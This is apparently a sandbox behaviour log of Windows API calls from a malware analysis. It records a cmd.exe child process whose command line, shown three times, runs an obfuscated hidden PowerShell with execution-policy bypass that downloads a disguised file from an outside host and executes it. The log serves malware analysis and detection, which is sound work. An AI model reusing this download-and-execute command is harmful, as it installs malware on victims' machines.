	[0245.991] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0245.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.991] CoTaskMemFree (pv=0x204160) 
	[0245.994] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0245.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.994] CoTaskMemFree (pv=0x204160) 
	[0245.996] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0245.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.996] CoTaskMemFree (pv=0x204160) 
	[0246.003] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0246.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.003] CoTaskMemFree (pv=0x204160) 
	[0246.008] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0246.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.008] CoTaskMemFree (pv=0x204160) 
	[0246.009] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0246.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.009] CoTaskMemFree (pv=0x204160) 
	[0246.282] VirtualQuery (in: lpAddress=0x1abb50, lpBuffer=0x1aca10, dwLength=0x30 | out: lpBuffer=0x1aca10*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0246.285] VirtualQuery (in: lpAddress=0x1abb50, lpBuffer=0x1aca10, dwLength=0x30 | out: lpBuffer=0x1aca10*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0249.875] VirtualQuery (in: lpAddress=0x1abb50, lpBuffer=0x1aca10, dwLength=0x30 | out: lpBuffer=0x1aca10*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.351] CoTaskMemFree (pv=0x204160) 
	[0251.962] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2045a0
	[0258.620] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2047c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.620] CoTaskMemFree (pv=0x2047c0) 
	[0259.403] CoTaskMemAlloc (cb=0x104) returned 0x2047c0
	[0259.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2047c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.403] CoTaskMemFree (pv=0x2047c0) 
	[0259.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74

Thread:
	id = 245
	os_tid = 0x8f8


Thread:
	id = 248
	os_tid = 0x8bc


Thread:
	id = 251
	os_tid = 0xb00


Thread:
	id = 254
	os_tid = 0xb14


Thread:
	id = 255
	os_tid = 0xb08

	[0099.718] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0149.916] LocalFree (hMem=0x2138f0) returned 0x0
	[0149.916] CloseHandle (hObject=0x320) returned 1
	[0149.916] CloseHandle (hObject=0x13) returned 1
	[0149.917] CloseHandle (hObject=0xf) returned 1
	[0149.918] RegCloseKey (hKey=0x30c) returned 0x0
	[0149.918] RegCloseKey (hKey=0x308) returned 0x0
	[0149.918] RegCloseKey (hKey=0x304) returned 0x0
	[0149.918] LocalFree (hMem=0x2138c0) returned 0x0
	[0149.919] RegCloseKey (hKey=0x32c) returned 0x0
	[0166.032] RegCloseKey (hKey=0x2e4) returned 0x0
	[0213.212] RegCloseKey (hKey=0x360) returned 0x0
	[0213.212] RegCloseKey (hKey=0x35c) returned 0x0
	[0213.213] RegCloseKey (hKey=0x358) returned 0x0
	[0213.213] RegCloseKey (hKey=0x354) returned 0x0
	[0213.213] RegCloseKey (hKey=0x350) returned 0x0
	[0213.213] RegCloseKey (hKey=0x34c) returned 0x0
	[0213.213] RegCloseKey (hKey=0x348) returned 0x0
	[0213.213] RegCloseKey (hKey=0x378) returned 0x0
	[0213.214] RegCloseKey (hKey=0x374) returned 0x0
	[0213.214] RegCloseKey (hKey=0x338) returned 0x0
	[0213.214] RegCloseKey (hKey=0x334) returned 0x0
	[0213.214] RegCloseKey (hKey=0x320) returned 0x0
	[0213.215] RegCloseKey (hKey=0x30c) returned 0x0
	[0213.215] RegCloseKey (hKey=0x308) returned 0x0
	[0213.215] RegCloseKey (hKey=0x304) returned 0x0
	[0213.215] RegCloseKey (hKey=0x32c) returned 0x0
	[0213.215] RegCloseKey (hKey=0x328) returned 0x0
	[0213.216] RegCloseKey (hKey=0x324) returned 0x0
	[0213.216] RegCloseKey (hKey=0x370) returned 0x0
	[0213.216] RegCloseKey (hKey=0x36c) returned 0x0
	[0213.216] RegCloseKey (hKey=0x368) returned 0x0
	[0213.216] RegCloseKey (hKey=0x344) returned 0x0
	[0252.864] RegCloseKey (hKey=0x328) returned 0x0
	[0252.864] RegCloseKey (hKey=0x324) returned 0x0
	[0252.864] RegCloseKey (hKey=0x370) returned 0x0
	[0252.865] RegCloseKey (hKey=0x36c) returned 0x0
	[0252.865] RegCloseKey (hKey=0x368) returned 0x0
	[0252.865] RegCloseKey (hKey=0x364) returned 0x0
	[0252.865] RegCloseKey (hKey=0x32c) returned 0x0

Thread:
	id = 351
	os_tid = 0xd14


Process:
	id = "31"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x3722c000"
	os_pid = "0x9fc"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "28"
	os_parent_pid = "0xa34"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 252
	os_tid = 0x9ec

	[0100.029] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfae0 | out: lpSystemTimeAsFileTime=0x2cfae0*(dwLowDateTime=0xb3f0f2e0, dwHighDateTime=0x1d543d1)) 
	[0100.029] GetCurrentProcessId () returned 0x9fc
	[0100.029] GetCurrentThreadId () returned 0x9ec
	[0100.029] GetTickCount () returned 0x29877
	[0100.029] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfae8 | out: lpPerformanceCount=0x2cfae8*=22445504881) returned 1
	[0100.030] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
	[0100.030] __set_app_type (_Type=0x1) 
	[0100.030] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac77810) returned 0x0
	[0100.030] __getmainargs (in: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610, _DoWildCard=0, _StartInfo=0x4ac7e0f4 | out: _Argc=0x4ac9a608, _Argv=0x4ac9a618, _Env=0x4ac9a610) returned 0
	[0100.031] GetCurrentThreadId () returned 0x9ec
	[0100.031] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9ec) returned 0x3c
	[0100.031] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0100.031] GetProcAddress (hModule=0x77040000, lpProcName="SetThreadUILanguage") returned 0x77056d40
	[0100.031] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0100.032] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0100.032] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa78 | out: phkResult=0x2cfa78*=0x0) returned 0x2
	[0100.032] VirtualQuery (in: lpAddress=0x2cfa60, lpBuffer=0x2cf9e0, dwLength=0x30 | out: lpBuffer=0x2cf9e0*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.032] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf9e0, dwLength=0x30 | out: lpBuffer=0x2cf9e0*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.032] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf9e0, dwLength=0x30 | out: lpBuffer=0x2cf9e0*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.032] VirtualQuery (in: lpAddress=0x1d4000, lpBuffer=0x2cf9e0, dwLength=0x30 | out: lpBuffer=0x2cf9e0*(BaseAddress=0x1d4000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0100.032] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf9e0, dwLength=0x30 | out: lpBuffer=0x2cf9e0*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0100.032] GetConsoleOutputCP () returned 0x1b5
	[0100.032] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0100.032] SetConsoleCtrlHandler (HandlerRoutine=0x4ac73184, Add=1) returned 1
	[0100.033] _get_osfhandle (_FileHandle=1) returned 0x7
	[0100.033] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0100.033] _get_osfhandle (_FileHandle=1) returned 0x7
	[0100.033] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac7e194 | out: lpMode=0x4ac7e194) returned 1
	[0100.033] _get_osfhandle (_FileHandle=1) returned 0x7
	[0100.033] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0100.033] _get_osfhandle (_FileHandle=0) returned 0x3
	[0100.033] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac7e198 | out: lpMode=0x4ac7e198) returned 1
	[0100.033] _get_osfhandle (_FileHandle=0) returned 0x3
	[0100.033] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1
	[0100.034] GetEnvironmentStringsW () returned 0x3b8f20*
	[0100.034] GetProcessHeap () returned 0x3a0000
	[0100.034] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xad4) returned 0x3b9a00
	[0100.034] FreeEnvironmentStringsW (penv=0x3b8f20) returned 1
	[0100.034] GetProcessHeap () returned 0x3a0000
	[0100.034] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x8) returned 0x3b87a0
	[0100.034] GetEnvironmentStringsW () returned 0x3b8f20*
	[0100.034] GetProcessHeap () returned 0x3a0000
	[0100.034] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xad4) returned 0x3ba4e0
	[0100.034] FreeEnvironmentStringsW (penv=0x3b8f20) returned 1
	[0100.034] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce938 | out: phkResult=0x2ce938*=0x44) returned 0x0
	[0100.034] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x0, lpData=0x2ce950*=0x18, lpcbData=0x2ce934*=0x1000) returned 0x2
	[0100.034] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x4, lpData=0x2ce950*=0x1, lpcbData=0x2ce934*=0x4) returned 0x0
	[0100.034] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x0, lpData=0x2ce950*=0x1, lpcbData=0x2ce934*=0x1000) returned 0x2
	[0100.034] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x4, lpData=0x2ce950*=0x0, lpcbData=0x2ce934*=0x4) returned 0x0
	[0100.034] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x4, lpData=0x2ce950*=0x40, lpcbData=0x2ce934*=0x4) returned 0x0
	[0100.034] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x4, lpData=0x2ce950*=0x40, lpcbData=0x2ce934*=0x4) returned 0x0
	[0100.035] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x0, lpData=0x2ce950*=0x40, lpcbData=0x2ce934*=0x1000) returned 0x2
	[0100.035] RegCloseKey (hKey=0x44) returned 0x0
	[0100.035] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce938 | out: phkResult=0x2ce938*=0x44) returned 0x0
	[0100.035] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x0, lpData=0x2ce950*=0x40, lpcbData=0x2ce934*=0x1000) returned 0x2
	[0100.035] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x4, lpData=0x2ce950*=0x1, lpcbData=0x2ce934*=0x4) returned 0x0
	[0100.035] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x0, lpData=0x2ce950*=0x1, lpcbData=0x2ce934*=0x1000) returned 0x2
	[0100.035] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x4, lpData=0x2ce950*=0x0, lpcbData=0x2ce934*=0x4) returned 0x0
	[0100.035] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x4, lpData=0x2ce950*=0x9, lpcbData=0x2ce934*=0x4) returned 0x0
	[0100.035] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x4, lpData=0x2ce950*=0x9, lpcbData=0x2ce934*=0x4) returned 0x0
	[0100.035] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce930, lpData=0x2ce950, lpcbData=0x2ce934*=0x1000 | out: lpType=0x2ce930*=0x0, lpData=0x2ce950*=0x9, lpcbData=0x2ce934*=0x1000) returned 0x2
	[0100.035] RegCloseKey (hKey=0x44) returned 0x0
	[0100.035] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e72
	[0100.035] srand (_Seed=0x5d3b2e72) 
	[0100.035] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0100.035] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0100.035] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0100.035] GetProcessHeap () returned 0x3a0000
	[0100.035] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x218) returned 0x3b8f20
	[0100.035] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b8f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0100.036] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0100.036] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0100.036] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0100.036] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0100.036] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0100.036] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0100.036] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0100.036] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0100.036] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0100.036] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0100.036] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0100.036] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0100.036] GetProcessHeap () returned 0x3a0000
	[0100.036] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b9a00 | out: hHeap=0x3a0000) returned 1
	[0100.036] GetEnvironmentStringsW () returned 0x3b9140*
	[0100.036] GetProcessHeap () returned 0x3a0000
	[0100.036] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xaec) returned 0x3bbad0
	[0100.036] FreeEnvironmentStringsW (penv=0x3b9140) returned 1
	[0100.036] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0100.036] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0100.036] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0100.036] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0100.036] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0100.036] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0100.037] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0100.037] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0100.037] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0100.037] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0100.037] GetProcessHeap () returned 0x3a0000
	[0100.037] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x48) returned 0x3b8d80
	[0100.037] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf740 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0100.037] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x2cf740, lpFilePart=0x2cf720 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x2cf720*="Documents") returned 0x1b
	[0100.037] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0100.037] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf450 | out: lpFindFileData=0x2cf450*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x3bc5d0
	[0100.037] FindClose (in: hFindFile=0x3bc5d0 | out: hFindFile=0x3bc5d0) returned 1
	[0100.037] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x2cf450 | out: lpFindFileData=0x2cf450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x3bc5d0
	[0100.037] FindClose (in: hFindFile=0x3bc5d0 | out: hFindFile=0x3bc5d0) returned 1
	[0100.037] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x2cf450 | out: lpFindFileData=0x2cf450*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x3bc5d0
	[0100.037] FindClose (in: hFindFile=0x3bc5d0 | out: hFindFile=0x3bc5d0) returned 1
	[0100.037] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0100.037] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0100.038] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0100.038] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0100.038] GetProcessHeap () returned 0x3a0000
	[0100.038] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bbad0 | out: hHeap=0x3a0000) returned 1
	[0100.038] GetEnvironmentStringsW () returned 0x3bafd0*
	[0100.038] GetProcessHeap () returned 0x3a0000
	[0100.038] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xb2c) returned 0x3bbb10
	[0100.038] FreeEnvironmentStringsW (penv=0x3bafd0) returned 1
	[0100.038] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0100.038] GetProcessHeap () returned 0x3a0000
	[0100.038] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b8d80 | out: hHeap=0x3a0000) returned 1
	[0100.038] GetProcessHeap () returned 0x3a0000
	[0100.038] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4016) returned 0x3bc650
	[0100.038] GetProcessHeap () returned 0x3a0000
	[0100.038] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x260) returned 0x3b9c80
	[0100.038] GetProcessHeap () returned 0x3a0000
	[0100.038] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bc650 | out: hHeap=0x3a0000) returned 1
	[0100.038] GetConsoleOutputCP () returned 0x1b5
	[0100.039] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0100.039] GetUserDefaultLCID () returned 0x409
	[0100.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0100.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf850, cchData=128 | out: lpLCData="0") returned 2
	[0100.039] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf850, cchData=128 | out: lpLCData="0") returned 2
